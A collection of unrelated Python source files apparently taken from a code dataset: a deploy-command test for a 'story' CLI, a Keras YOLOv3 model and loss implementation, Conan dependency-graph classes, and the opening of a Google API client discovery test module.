@mark.parametrize('payload', [
None, {'stories': {'foo'}, 'services': ['bar', 'baz']}
])
def test_deploy(runner, with_message, patch, hard_deployment,
final_release_state, maintenance, payload,
init_sample_app_in_cwd):
with runner.runner.isolated_filesystem():
init_sample_app_in_cwd()
# Relative imports are used here since we need to trigger
# the cli init code in an isolated filesystem, inside an app dir.
# Weird things happen otherwise. Not the most efficient way, but works.
from story import api
from story.commands import test
from story.commands.deploy import deploy
patch.object(test, 'compile_app', return_value=payload)
patch.object(time, 'sleep')
patch.object(api.Config, 'get')
patch.object(api.Releases, 'create')
patch.object(api.Releases, 'get', side_effect=[
[{'state': 'QUEUED'}],
[{'state': 'DEPLOYING'}],
[{'state': final_release_state}],
])
patch.object(api.Apps, 'maintenance', return_value=maintenance)
args = []
if with_message:
message = 'hello world'
args.append('--message')
args.append(message)
else:
message = None
if hard_deployment:
args.append('--hard')
if payload is None:
result = runner.run(deploy, exit_code=1)
assert result.stdout == ''
return
else:
result = runner.run(deploy, exit_code=0, args=args)
if maintenance:
assert 'Your app is in maintenance mode.' in result.stdout
return
api.Config.get.assert_called_with('my_app')
api.Releases.create.assert_called_with(
api.Config.get(), payload, 'my_app', message, hard_deployment)
assert time.sleep.call_count == 3
if final_release_state == 'DEPLOYED':
assert 'Configured 1 story' in result.stdout
assert '- foo' in result.stdout
assert 'Deployed 2 services' in result.stdout
assert '- bar' in result.stdout
assert '- baz' in result.stdout
assert 'Created ingress route' in result.stdout
assert 'Configured logging' in result.stdout
assert 'Configured health checks' in result.stdout
assert 'Deployment successful!' in result.stdout
elif final_release_state == 'FAILED':
assert 'Deployment failed!' in result.stdout
assert 'story logs' in result.stdout
elif final_release_state == 'TEMP_DEPLOYMENT_FAILURE':
assert 'Deployment failed!' in result.stdout
assert 'status.storyscript.io' in result.stdout
else:
assert f'An unhandled state of your app has been encountered ' \
f'- {final_release_state}' in result.stdout
assert '[email protected]' in result.stdout
def test_deploy_no_stories(runner, patch, init_sample_app_in_cwd):
with runner.runner.isolated_filesystem():
with open('story.yml', 'w') as f:
f.write('app_name: my_app\n')
from story.commands import test
from story.commands.deploy import deploy
patch.object(test, 'compile_app', return_value={'stories': []})
result = runner.run(deploy, exit_code=1, args=[])
assert 'No stories were found for your app' in result.stdout
assert 'You can write an example story using:' in result.stdout
assert 'story template http > http.story' in result.stdout
|
py | b41050ed255dd357c36b36a7c8cad592fea97b64 | """YOLO_v3 Model Defined in Keras."""
from functools import wraps
import numpy as np
import tensorflow as tf
from keras import backend as K
from keras.layers import Conv2D, Add, ZeroPadding2D, UpSampling2D, Concatenate, MaxPooling2D
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.normalization import BatchNormalization
from keras.models import Model
from keras.regularizers import l2
from yolo3.utils import compose
@wraps(Conv2D)
def DarknetConv2D(*args, **kwargs):
"""Wrapper to set Darknet parameters for Convolution2D."""
darknet_conv_kwargs = {'kernel_regularizer': l2(5e-4)}
darknet_conv_kwargs['padding'] = 'valid' if kwargs.get('strides')==(2,2) else 'same'
darknet_conv_kwargs.update(kwargs)
return Conv2D(*args, **darknet_conv_kwargs)
def DarknetConv2D_BN_Leaky(*args, **kwargs):
"""Darknet Convolution2D followed by BatchNormalization and LeakyReLU."""
no_bias_kwargs = {'use_bias': False}
no_bias_kwargs.update(kwargs)
return compose(
DarknetConv2D(*args, **no_bias_kwargs),
BatchNormalization(),
LeakyReLU(alpha=0.1))
def resblock_body(x, num_filters, num_blocks):
'''A series of resblocks starting with a downsampling Convolution2D'''
# Darknet uses left and top padding instead of 'same' mode
x = ZeroPadding2D(((1,0),(1,0)))(x)
x = DarknetConv2D_BN_Leaky(num_filters, (3,3), strides=(2,2))(x)
for i in range(num_blocks):
y = compose(
DarknetConv2D_BN_Leaky(num_filters//2, (1,1)),
DarknetConv2D_BN_Leaky(num_filters, (3,3)))(x)
x = Add()([x,y])
return x
def darknet_body(x):
'''Darknent body having 52 Convolution2D layers'''
x = DarknetConv2D_BN_Leaky(32, (3,3))(x)
x = resblock_body(x, 64, 1)
x = resblock_body(x, 128, 2)
x = resblock_body(x, 256, 8)
x = resblock_body(x, 512, 8)
x = resblock_body(x, 1024, 4)
return x
def make_last_layers(x, num_filters, out_filters):
'''6 Conv2D_BN_Leaky layers followed by a Conv2D_linear layer'''
x = compose(
DarknetConv2D_BN_Leaky(num_filters, (1,1)),
DarknetConv2D_BN_Leaky(num_filters*2, (3,3)),
DarknetConv2D_BN_Leaky(num_filters, (1,1)),
DarknetConv2D_BN_Leaky(num_filters*2, (3,3)),
DarknetConv2D_BN_Leaky(num_filters, (1,1)))(x)
y = compose(
DarknetConv2D_BN_Leaky(num_filters*2, (3,3)),
DarknetConv2D(out_filters, (1,1)))(x)
return x, y
def yolo_body(inputs, num_anchors, num_classes):
"""Create YOLO_V3 model CNN body in Keras."""
darknet = Model(inputs, darknet_body(inputs))
x, y1 = make_last_layers(darknet.output, 512, num_anchors*(num_classes+5))
x = compose(
DarknetConv2D_BN_Leaky(256, (1,1)),
UpSampling2D(2))(x)
x = Concatenate()([x,darknet.layers[152].output])
x, y2 = make_last_layers(x, 256, num_anchors*(num_classes+5))
x = compose(
DarknetConv2D_BN_Leaky(128, (1,1)),
UpSampling2D(2))(x)
x = Concatenate()([x,darknet.layers[92].output])
x, y3 = make_last_layers(x, 128, num_anchors*(num_classes+5))
return Model(inputs, [y1,y2,y3])
def tiny_yolo_body(inputs, num_anchors, num_classes):
'''Create Tiny YOLO_v3 model CNN body in keras.'''
x1 = compose(
DarknetConv2D_BN_Leaky(16, (3,3)),
MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
DarknetConv2D_BN_Leaky(32, (3,3)),
MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
DarknetConv2D_BN_Leaky(64, (3,3)),
MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
DarknetConv2D_BN_Leaky(128, (3,3)),
MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
DarknetConv2D_BN_Leaky(256, (3,3)))(inputs)
x2 = compose(
MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
DarknetConv2D_BN_Leaky(512, (3,3)),
MaxPooling2D(pool_size=(2,2), strides=(1,1), padding='same'),
DarknetConv2D_BN_Leaky(1024, (3,3)),
DarknetConv2D_BN_Leaky(256, (1,1)))(x1)
y1 = compose(
DarknetConv2D_BN_Leaky(512, (3,3)),
DarknetConv2D(num_anchors*(num_classes+5), (1,1)))(x2)
x2 = compose(
DarknetConv2D_BN_Leaky(128, (1,1)),
UpSampling2D(2))(x2)
y2 = compose(
Concatenate(),
DarknetConv2D_BN_Leaky(256, (3,3)),
DarknetConv2D(num_anchors*(num_classes+5), (1,1)))([x2,x1])
return Model(inputs, [y1,y2])
def yolo_head(feats, anchors, num_classes, input_shape, calc_loss=False):
"""Convert final layer features to bounding box parameters."""
num_anchors = len(anchors)
# Reshape to batch, height, width, num_anchors, box_params.
anchors_tensor = K.reshape(K.constant(anchors), [1, 1, 1, num_anchors, 2])
grid_shape = K.shape(feats)[1:3] # height, width
grid_y = K.tile(K.reshape(K.arange(0, stop=grid_shape[0]), [-1, 1, 1, 1]),
[1, grid_shape[1], 1, 1])
grid_x = K.tile(K.reshape(K.arange(0, stop=grid_shape[1]), [1, -1, 1, 1]),
[grid_shape[0], 1, 1, 1])
grid = K.concatenate([grid_x, grid_y])
grid = K.cast(grid, K.dtype(feats))
feats = K.reshape(
feats, [-1, grid_shape[0], grid_shape[1], num_anchors, num_classes + 5])
# Adjust preditions to each spatial grid point and anchor size.
# box_xy is the center of predicted box, in image coordinates. They are bx,by in article
# box_wh is bw, bh in article.
# feats, or output of model_body, is tx, ty, tw, th. sigmoid(feats) => box confidence, and classes's confidence.
box_xy = (K.sigmoid(feats[..., :2]) + grid) / K.cast(grid_shape[::-1], K.dtype(feats))
box_wh = K.exp(feats[..., 2:4]) * anchors_tensor / K.cast(input_shape[::-1], K.dtype(feats))
box_confidence = K.sigmoid(feats[..., 4:5])
box_class_probs = K.sigmoid(feats[..., 5:])
if calc_loss == True:
return grid, feats, box_xy, box_wh
return box_xy, box_wh, box_confidence, box_class_probs
def yolo_correct_boxes(box_xy, box_wh, input_shape, image_shape):
'''Get corrected boxes'''
box_yx = box_xy[..., ::-1]
box_hw = box_wh[..., ::-1]
input_shape = K.cast(input_shape, K.dtype(box_yx))
image_shape = K.cast(image_shape, K.dtype(box_yx))
new_shape = K.round(image_shape * K.min(input_shape/image_shape))
offset = (input_shape-new_shape)/2./input_shape
scale = input_shape/new_shape
box_yx = (box_yx - offset) * scale
box_hw *= scale
box_mins = box_yx - (box_hw / 2.)
box_maxes = box_yx + (box_hw / 2.)
boxes = K.concatenate([
box_mins[..., 0:1], # y_min
box_mins[..., 1:2], # x_min
box_maxes[..., 0:1], # y_max
box_maxes[..., 1:2] # x_max
])
# Scale boxes back to original image shape.
boxes *= K.concatenate([image_shape, image_shape])
return boxes
def yolo_boxes_and_scores(feats, anchors, num_classes, input_shape, image_shape):
'''Process Conv layer output'''
box_xy, box_wh, box_confidence, box_class_probs = yolo_head(feats,
anchors, num_classes, input_shape)
boxes = yolo_correct_boxes(box_xy, box_wh, input_shape, image_shape)
boxes = K.reshape(boxes, [-1, 4])
box_scores = box_confidence * box_class_probs
box_scores = K.reshape(box_scores, [-1, num_classes])
return boxes, box_scores
def yolo_eval(yolo_outputs,
anchors,
num_classes,
image_shape,
max_boxes=20,
score_threshold=.6,
iou_threshold=.5):
"""Evaluate YOLO model on given input and return filtered boxes."""
num_layers = len(yolo_outputs)
anchor_mask = [[6,7,8], [3,4,5], [0,1,2]] if num_layers==3 else [[3,4,5], [1,2,3]] # default setting
input_shape = K.shape(yolo_outputs[0])[1:3] * 32
boxes = []
box_scores = []
for l in range(num_layers):
_boxes, _box_scores = yolo_boxes_and_scores(yolo_outputs[l],
anchors[anchor_mask[l]], num_classes, input_shape, image_shape)
boxes.append(_boxes)
box_scores.append(_box_scores)
boxes = K.concatenate(boxes, axis=0)
box_scores = K.concatenate(box_scores, axis=0)
mask = box_scores >= score_threshold
max_boxes_tensor = K.constant(max_boxes, dtype='int32')
boxes_ = []
scores_ = []
classes_ = []
for c in range(num_classes):
# TODO: use keras backend instead of tf.
class_boxes = tf.boolean_mask(boxes, mask[:, c])
class_box_scores = tf.boolean_mask(box_scores[:, c], mask[:, c])
nms_index = tf.image.non_max_suppression(
class_boxes, class_box_scores, max_boxes_tensor, iou_threshold=iou_threshold)
class_boxes = K.gather(class_boxes, nms_index)
class_box_scores = K.gather(class_box_scores, nms_index)
classes = K.ones_like(class_box_scores, 'int32') * c
boxes_.append(class_boxes)
scores_.append(class_box_scores)
classes_.append(classes)
boxes_ = K.concatenate(boxes_, axis=0)
scores_ = K.concatenate(scores_, axis=0)
classes_ = K.concatenate(classes_, axis=0)
return boxes_, scores_, classes_
def preprocess_true_boxes(true_boxes, input_shape, anchors, num_classes):
'''Preprocess true boxes to training input format
Parameters
----------
true_boxes: array, shape=(m, T, 5)
Absolute x_min, y_min, x_max, y_max, class_id relative to input_shape.
input_shape: array-like, hw, multiples of 32
anchors: array, shape=(N, 2), wh
num_classes: integer
Returns
-------
y_true: list of array, shape like yolo_outputs, xywh are reletive value
'''
assert (true_boxes[..., 4]<num_classes).all(), 'class id must be less than num_classes'
num_layers = len(anchors)//3 # default setting
# correct mistake in last number : [[3,4,5], [1,2,3]] => [[3,4,5], [0,1,2]]. No it seems author's decision
anchor_mask = [[6,7,8], [3,4,5], [0,1,2]] if num_layers==3 else [[3,4,5], [1,2,3]]
true_boxes = np.array(true_boxes, dtype='float32')
input_shape = np.array(input_shape, dtype='int32')
# x,y is of center of boxes, w,h is the width and height of boxes
boxes_xy = (true_boxes[..., 0:2] + true_boxes[..., 2:4]) // 2
boxes_wh = true_boxes[..., 2:4] - true_boxes[..., 0:2]
# normalize true box into image coordinates (0,1)
true_boxes[..., 0:2] = boxes_xy/input_shape[::-1]
true_boxes[..., 2:4] = boxes_wh/input_shape[::-1]
# number of images in the batch, or batch_size
m = true_boxes.shape[0]
layer2stride = {0:32, 1:16, 2:8}
grid_shapes = [input_shape//layer2stride[l] for l in range(num_layers)]
# initialize y_true for correct output shapes
y_true = [np.zeros((m,grid_shapes[l][0],grid_shapes[l][1],len(anchor_mask[l]),5+num_classes),
dtype='float32') for l in range(num_layers)]
# Expand dim to apply broadcasting.
anchors = np.expand_dims(anchors, 0)
anchor_maxes = anchors / 2.
anchor_mins = -anchor_maxes
valid_mask = boxes_wh[..., 0]>0
for b in range(m):
# Discard zero rows.
wh = boxes_wh[b, valid_mask[b]]
if len(wh)==0: continue
# Expand dim to apply broadcasting.
wh = np.expand_dims(wh, -2)
box_maxes = wh / 2.
box_mins = -box_maxes
# assume in perfect case, two centers of anchor and true_box are coincide, what is IoU?
# => find best anchor size for a true_box
intersect_mins = np.maximum(box_mins, anchor_mins)
intersect_maxes = np.minimum(box_maxes, anchor_maxes)
intersect_wh = np.maximum(intersect_maxes - intersect_mins, 0.)
intersect_area = intersect_wh[..., 0] * intersect_wh[..., 1]
box_area = wh[..., 0] * wh[..., 1]
anchor_area = anchors[..., 0] * anchors[..., 1]
iou = intersect_area / (box_area + anchor_area - intersect_area)
# Find best anchor for each true box
best_anchor = np.argmax(iou, axis=-1)
# b is image number in batch
# t is number of true boxes in image
for t, n in enumerate(best_anchor):
for l in range(num_layers):
if n in anchor_mask[l]:
# find responsible cell
i = np.floor(true_boxes[b,t,0]*grid_shapes[l][1]).astype('int32')
j = np.floor(true_boxes[b,t,1]*grid_shapes[l][0]).astype('int32')
# index of best anchor in the best layer containing the best anchor
k = anchor_mask[l].index(n)
# index of class
c = true_boxes[b,t, 4].astype('int32')
# if there is an anchor in a cell which is best fitted to multi true_boxes
# => has same i,j,k index for different t
# => former will be replaced by latter
y_true[l][b, j, i, k, 0:4] = true_boxes[b,t, 0:4]
y_true[l][b, j, i, k, 4] = 1
y_true[l][b, j, i, k, 5+c] = 1
return y_true
def box_iou(b1, b2):
'''Return iou tensor
Parameters
----------
b1: tensor, shape=(i1,...,iN, 4), xywh
b2: tensor, shape=(j, 4), xywh
Returns
-------
iou: tensor, shape=(i1,...,iN, j)
'''
# Expand dim to apply broadcasting.
b1 = K.expand_dims(b1, -2)
b1_xy = b1[..., :2]
b1_wh = b1[..., 2:4]
b1_wh_half = b1_wh/2.
b1_mins = b1_xy - b1_wh_half
b1_maxes = b1_xy + b1_wh_half
# Expand dim to apply broadcasting.
b2 = K.expand_dims(b2, 0)
b2_xy = b2[..., :2]
b2_wh = b2[..., 2:4]
b2_wh_half = b2_wh/2.
b2_mins = b2_xy - b2_wh_half
b2_maxes = b2_xy + b2_wh_half
intersect_mins = K.maximum(b1_mins, b2_mins)
intersect_maxes = K.minimum(b1_maxes, b2_maxes)
intersect_wh = K.maximum(intersect_maxes - intersect_mins, 0.)
intersect_area = intersect_wh[..., 0] * intersect_wh[..., 1]
b1_area = b1_wh[..., 0] * b1_wh[..., 1]
b2_area = b2_wh[..., 0] * b2_wh[..., 1]
iou = intersect_area / (b1_area + b2_area - intersect_area)
return iou
def yolo_loss(args, anchors, num_classes, ignore_thresh=.5, print_loss=False):
'''Return yolo_loss tensor
Parameters
----------
yolo_outputs: list of tensor, the output of yolo_body or tiny_yolo_body
y_true: list of array, the output of preprocess_true_boxes
anchors: array, shape=(N, 2), wh
num_classes: integer
ignore_thresh: float, the iou threshold whether to ignore object confidence loss
Returns
-------
loss: tensor, shape=(1,)
'''
num_layers = len(anchors)//3 # default setting
yolo_outputs = args[:num_layers]
y_true = args[num_layers:]
anchor_mask = [[6,7,8], [3,4,5], [0,1,2]] if num_layers==3 else [[3,4,5], [1,2,3]]
input_shape = K.cast(K.shape(yolo_outputs[0])[1:3] * 32, K.dtype(y_true[0]))
grid_shapes = [K.cast(K.shape(yolo_outputs[l])[1:3], K.dtype(y_true[0])) for l in range(num_layers)]
loss = 0
m = K.shape(yolo_outputs[0])[0] # batch size, tensor
mf = K.cast(m, K.dtype(yolo_outputs[0]))
for l in range(num_layers):
# object_mask = 1 for object cell
object_mask = y_true[l][..., 4:5]
# true class probs = 1 for class of object cell
true_class_probs = y_true[l][..., 5:]
# raw_pred, or output of model_body, is tx, ty, tw, th. sigmoid(raw_pred) => box confidence, and classes's confidence.
grid, raw_pred, pred_xy, pred_wh = yolo_head(yolo_outputs[l],
anchors[anchor_mask[l]], num_classes, input_shape, calc_loss=True)
pred_box = K.concatenate([pred_xy, pred_wh])
# Darknet raw box to calculate loss.
# y_true x,y,w,h are normalized in image coordinate
# y_true for x,y is true value for bx, bx, normalized in image coordinates in article.
# y_true for w,h is true value for bw, bh, normalized in image coordinates in article.
# raw_true_xy is true value for sigmoid(tx), sigmoid(ty), from 0=>1, is center position in grid coordinate in article.
# raw_true_wh is true value for tw, th in article.
raw_true_xy = y_true[l][..., :2]*grid_shapes[l][::-1] - grid
raw_true_wh = K.log(y_true[l][..., 2:4] / anchors[anchor_mask[l]] * input_shape[::-1])
raw_true_wh = K.switch(object_mask, raw_true_wh, K.zeros_like(raw_true_wh)) # avoid log(0)=-inf
# smaller object, larger box loss scale factor
box_loss_scale = 2 - y_true[l][...,2:3]*y_true[l][...,3:4]
# Find ignore mask, iterate over each of batch.
ignore_mask = tf.TensorArray(K.dtype(y_true[0]), size=1, dynamic_size=True)
object_mask_bool = K.cast(object_mask, 'bool')
def loop_body(b, ignore_mask):
true_box = tf.boolean_mask(y_true[l][b,...,0:4], object_mask_bool[b,...,0])
iou = box_iou(pred_box[b], true_box)
best_iou = K.max(iou, axis=-1)
ignore_mask = ignore_mask.write(b, K.cast(best_iou<ignore_thresh, K.dtype(true_box)))
return b+1, ignore_mask
_, ignore_mask = K.control_flow_ops.while_loop(lambda b,*args: b<m, loop_body, [0, ignore_mask])
ignore_mask = ignore_mask.stack()
ignore_mask = K.expand_dims(ignore_mask, -1)
# K.binary_crossentropy is helpful to avoid exp overflow.
xy_loss = object_mask * box_loss_scale * K.binary_crossentropy(raw_true_xy, raw_pred[...,0:2], from_logits=True)
# loss for tw, th. Squared error loss
wh_loss = object_mask * box_loss_scale * 0.5 * K.square(raw_true_wh-raw_pred[...,2:4])
confidence_loss = object_mask * K.binary_crossentropy(object_mask, raw_pred[...,4:5], from_logits=True)+ \
(1-object_mask) * K.binary_crossentropy(object_mask, raw_pred[...,4:5], from_logits=True) * ignore_mask
class_loss = object_mask * K.binary_crossentropy(true_class_probs, raw_pred[...,5:], from_logits=True)
xy_loss = K.sum(xy_loss) / mf
wh_loss = K.sum(wh_loss) / mf
confidence_loss = K.sum(confidence_loss) / mf
class_loss = K.sum(class_loss) / mf
# could we add weights for different losses?
loss += xy_loss + wh_loss + confidence_loss + class_loss
if print_loss:
loss = tf.Print(loss, [loss, xy_loss, wh_loss, confidence_loss, class_loss, K.sum(ignore_mask)], message='loss: ')
return loss
|
py | b41050ff3c640c272d1cbbf259c0c145783f368f | from conans.model.ref import PackageReference
from conans.model.info import ConanInfo
from conans.errors import conanfile_exception_formatter
from collections import OrderedDict
RECIPE_DOWNLOADED = "Downloaded"
RECIPE_INCACHE = "Cache" # The previously installed recipe in cache is being used
RECIPE_UPDATED = "Updated"
RECIPE_NEWER = "Newer" # The local recipe is modified and newer timestamp than server
RECIPE_NOT_IN_REMOTE = "Not in remote"
RECIPE_UPDATEABLE = "Update available" # The update of the recipe is available (only in conan info)
RECIPE_NO_REMOTE = "No remote"
RECIPE_WORKSPACE = "Workspace"
BINARY_CACHE = "Cache"
BINARY_DOWNLOAD = "Download"
BINARY_UPDATE = "Update"
BINARY_BUILD = "Build"
BINARY_MISSING = "Missing"
BINARY_SKIP = "Skip"
BINARY_WORKSPACE = "Workspace"
class Node(object):
def __init__(self, conan_ref, conanfile):
self.conan_ref = conan_ref
self.conanfile = conanfile
self.dependencies = [] # Ordered Edges
self.dependants = set() # Edges
self.binary = None
self.recipe = None
self.remote = None
self.binary_remote = None
self.build_require = False
def partial_copy(self):
result = Node(self.conan_ref, self.conanfile)
result.dependants = set()
result.dependencies = []
result.binary = self.binary
result.recipe = self.recipe
result.remote = self.remote
result.binary_remote = self.binary_remote
result.build_require = self.build_require
return result
def add_edge(self, edge):
if edge.src == self:
if edge not in self.dependencies:
self.dependencies.append(edge)
else:
self.dependants.add(edge)
def neighbors(self):
return [edge.dst for edge in self.dependencies]
def public_neighbors(self):
return [edge.dst for edge in self.dependencies
if not edge.private and not edge.build_require]
def private_neighbors(self):
return [edge.dst for edge in self.dependencies if edge.private or edge.build_require]
def inverse_neighbors(self):
return [edge.src for edge in self.dependants]
def __eq__(self, other):
return (self.conan_ref == other.conan_ref and
self.conanfile == other.conanfile)
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash((self.conan_ref, self.conanfile))
def __repr__(self):
return repr(self.conanfile)
def __cmp__(self, other):
if other is None:
return -1
elif self.conan_ref is None:
return 0 if other.conan_ref is None else -1
elif other.conan_ref is None:
return 1
if self.conan_ref == other.conan_ref:
return 0
if self.conan_ref < other.conan_ref:
return -1
return 1
def __gt__(self, other):
return self.__cmp__(other) == 1
def __lt__(self, other):
return self.__cmp__(other) == -1
def __le__(self, other):
return self.__cmp__(other) in [0, -1]
def __ge__(self, other):
return self.__cmp__(other) in [0, 1]
class Edge(object):
def __init__(self, src, dst, private=False, build_require=False):
self.src = src
self.dst = dst
self.private = private
self.build_require = build_require
def __eq__(self, other):
return self.src == self.src and self.dst == other.dst
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash((self.src, self.dst))
class DepsGraph(object):
def __init__(self):
self.nodes = set()
self.root = None
def add_graph(self, node, graph, build_require=False):
for n in graph.nodes:
if n != graph.root:
n.build_require = build_require
self.add_node(n)
for e in graph.root.dependencies:
e.src = node
e.build_require = build_require
node.dependencies = graph.root.dependencies + node.dependencies
def add_node(self, node):
if not self.nodes:
self.root = node
self.nodes.add(node)
def add_edge(self, src, dst, private=False, build_require=False):
assert src in self.nodes and dst in self.nodes
edge = Edge(src, dst, private, build_require)
src.add_edge(edge)
dst.add_edge(edge)
def compute_package_ids(self):
ordered = self.by_levels()
for level in ordered:
for node in level:
conanfile = node.conanfile
neighbors = node.neighbors()
direct_reqs = [] # of PackageReference
indirect_reqs = set() # of PackageReference, avoid duplicates
for neighbor in neighbors:
nref, nconan = neighbor.conan_ref, neighbor.conanfile
package_id = nconan.info.package_id()
package_reference = PackageReference(nref, package_id)
direct_reqs.append(package_reference)
indirect_reqs.update(nconan.info.requires.refs())
conanfile.options.propagate_downstream(nref, nconan.info.full_options)
# Might be never used, but update original requirement, just in case
conanfile.requires[nref.name].conan_reference = nref
# Make sure not duplicated
indirect_reqs.difference_update(direct_reqs)
# There might be options that are not upstream, backup them, might be
# for build-requires
conanfile.build_requires_options = conanfile.options.values
conanfile.options.clear_unused(indirect_reqs.union(direct_reqs))
conanfile.info = ConanInfo.create(conanfile.settings.values,
conanfile.options.values,
direct_reqs,
indirect_reqs)
# Once we are done, call package_id() to narrow and change possible values
with conanfile_exception_formatter(str(conanfile), "package_id"):
conanfile.package_id()
return ordered
def full_closure(self, node, private=False):
# Needed to propagate correctly the cpp_info even with privates
closure = OrderedDict()
current = node.neighbors()
while current:
new_current = []
for n in current:
closure[n] = n
for n in current:
neighbors = n.public_neighbors() if not private else n.neighbors()
for neigh in neighbors:
if neigh not in new_current and neigh not in closure:
new_current.append(neigh)
current = new_current
return closure
def closure(self, node):
closure = OrderedDict()
current = node.neighbors()
while current:
new_current = []
for n in current:
closure[n.conan_ref.name] = n
for n in current:
neighs = n.public_neighbors()
for neigh in neighs:
if neigh not in new_current and neigh.conan_ref.name not in closure:
new_current.append(neigh)
current = new_current
return closure
def _inverse_closure(self, references):
closure = set()
current = [n for n in self.nodes if str(n.conan_ref) in references or "ALL" in references]
closure.update(current)
while current:
new_current = set()
for n in current:
closure.add(n)
new_neighs = n.inverse_neighbors()
to_add = set(new_neighs).difference(current)
new_current.update(to_add)
current = new_current
return closure
def collapse_graph(self):
"""Computes and return a new graph, that doesn't have duplicated nodes with the same
PackageReference. This is the case for build_requires and private requirements
"""
result = DepsGraph()
result.add_node(self.root.partial_copy())
unique_nodes = {} # {PackageReference: Node (result, unique)}
nodes_map = {self.root: result.root} # {Origin Node: Result Node}
# Add the nodes, without repetition. THe "node.partial_copy()" copies the nodes
# without Edges
for node in self.nodes:
if not node.conan_ref:
continue
package_ref = PackageReference(node.conan_ref, node.conanfile.info.package_id())
if package_ref not in unique_nodes:
result_node = node.partial_copy()
result.add_node(result_node)
unique_nodes[package_ref] = result_node
else:
result_node = unique_nodes[package_ref]
nodes_map[node] = result_node
# Compute the new edges of the graph
for node in self.nodes:
result_node = nodes_map[node]
for dep in node.dependencies:
src = result_node
dst = nodes_map[dep.dst]
result.add_edge(src, dst, dep.private, dep.build_require)
for dep in node.dependants:
src = nodes_map[dep.src]
dst = result_node
result.add_edge(src, dst, dep.private, dep.build_require)
return result
def build_order(self, references):
new_graph = self.collapse_graph()
levels = new_graph.inverse_levels()
closure = new_graph._inverse_closure(references)
result = []
for level in reversed(levels):
new_level = [n.conan_ref for n in level if (n in closure and n.conan_ref)]
if new_level:
result.append(new_level)
return result
def nodes_to_build(self):
ret = []
for level in self.by_levels():
for node in level:
if node.binary == BINARY_BUILD:
if node.conan_ref not in ret:
ret.append(node.conan_ref)
return ret
def by_levels(self):
return self._order_levels(True)
def inverse_levels(self):
return self._order_levels(False)
def _order_levels(self, direct):
""" order by node degree. The first level will be the one which nodes dont have
dependencies. Second level will be with nodes that only have dependencies to
first level nodes, and so on
return [[node1, node34], [node3], [node23, node8],...]
"""
current_level = []
result = [current_level]
opened = self.nodes.copy()
while opened:
current = opened.copy()
for o in opened:
o_neighs = o.neighbors() if direct else o.inverse_neighbors()
if not any(n in opened for n in o_neighs):
current_level.append(o)
current.discard(o)
current_level.sort()
# now initialize new level
opened = current
if opened:
current_level = []
result.append(current_level)
return result
|
py | b41051aecb77dc9a727c8b3b9aa3cb6795f26cec | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Discovery document tests
Unit tests for objects created from discovery documents.
"""
from __future__ import absolute_import
import six
__author__ = '[email protected] (Joe Gregorio)'
from six import BytesIO, StringIO
from six.moves.urllib.parse import urlparse, parse_qs
import copy
import datetime
import httplib2
import itertools
import json
import os
import pickle
import re
import sys
import unittest2 as unittest
import mock
import google.auth.credentials
import google_auth_httplib2
from googleapiclient.discovery import _fix_up_media_upload
from googleapiclient.discovery import _fix_up_method_description
from googleapiclient.discovery import _fix_up_parameters
from googleapiclient.discovery import _urljoin
from googleapiclient.discovery import build
from googleapiclient.discovery import build_from_document
from googleapiclient.discovery import DISCOVERY_URI
from googleapiclient.discovery import key2param
from googleapiclient.discovery import MEDIA_BODY_PARAMETER_DEFAULT_VALUE
from googleapiclient.discovery import MEDIA_MIME_TYPE_PARAMETER_DEFAULT_VALUE
from googleapiclient.discovery import ResourceMethodParameters
from googleapiclient.discovery import STACK_QUERY_PARAMETERS
from googleapiclient.discovery import STACK_QUERY_PARAMETER_DEFAULT_VALUE
from googleapiclient.discovery_cache import DISCOVERY_DOC_MAX_AGE
from googleapiclient.discovery_cache.base import Cache
from googleapiclient.errors import HttpError
from googleapiclient.errors import InvalidJsonError
from googleapiclient.errors import MediaUploadSizeError
from googleapiclient.errors import ResumableUploadError
from googleapiclient.errors import UnacceptableMimeTypeError
from googleapiclient.errors import UnknownApiNameOrVersion
from googleapiclient.errors import UnknownFileType
from googleapiclient.http import build_http
from googleapiclient.http import BatchHttpRequest
from googleapiclient.http import HttpMock
from googleapiclient.http import HttpMockSequence
from googleapiclient.http import MediaFileUpload
from googleapiclient.http import MediaIoBaseUpload
from googleapiclient.http import MediaUpload
from googleapiclient.http import MediaUploadProgress
from googleapiclient.http import tunnel_patch
from googleapiclient.model import JsonModel
from googleapiclient.schema import Schemas
from oauth2client import GOOGLE_TOKEN_URI
from oauth2client.client import OAuth2Credentials, GoogleCredentials
from googleapiclient import _helpers as util
import uritemplate
DATA_DIR = os.path.join(os.path.dirname(__file__), 'data')
def assertUrisEqual(testcase, expected, actual):
"""Test that URIs are the same, up to reordering of query parameters."""
expected = urlparse(expected)
actual = urlparse(actual)
testcase.assertEqual(expected.scheme, actual.scheme)
testcase.assertEqual(expected.netloc, actual.netloc)
testcase.assertEqual(expected.path, actual.path)
testcase.assertEqual(expected.params, actual.params)
testcase.assertEqual(expected.fragment, actual.fragment)
expected_query = parse_qs(expected.query)
actual_query = parse_qs(actual.query)
for name in list(expected_query.keys()):
testcase.assertEqual(expected_query[name], actual_query[name])
for name in list(actual_query.keys()):
testcase.assertEqual(expected_query[name], actual_query[name])
def datafile(filename):
return os.path.join(DATA_DIR, filename)
class SetupHttplib2(unittest.TestCase):
def test_retries(self):
# Merely loading googleapiclient.discovery should set the RETRIES to 1.
self.assertEqual(1, httplib2.RETRIES)
class Utilities(unittest.TestCase):
def setUp(self):
with open(datafile('zoo.json'), 'r') as fh:
self.zoo_root_desc = json.loads(fh.read())
self.zoo_get_method_desc = self.zoo_root_desc['methods']['query']
self.zoo_animals_resource = self.zoo_root_desc['resources']['animals']
self.zoo_insert_method_desc = self.zoo_animals_resource['methods']['insert']
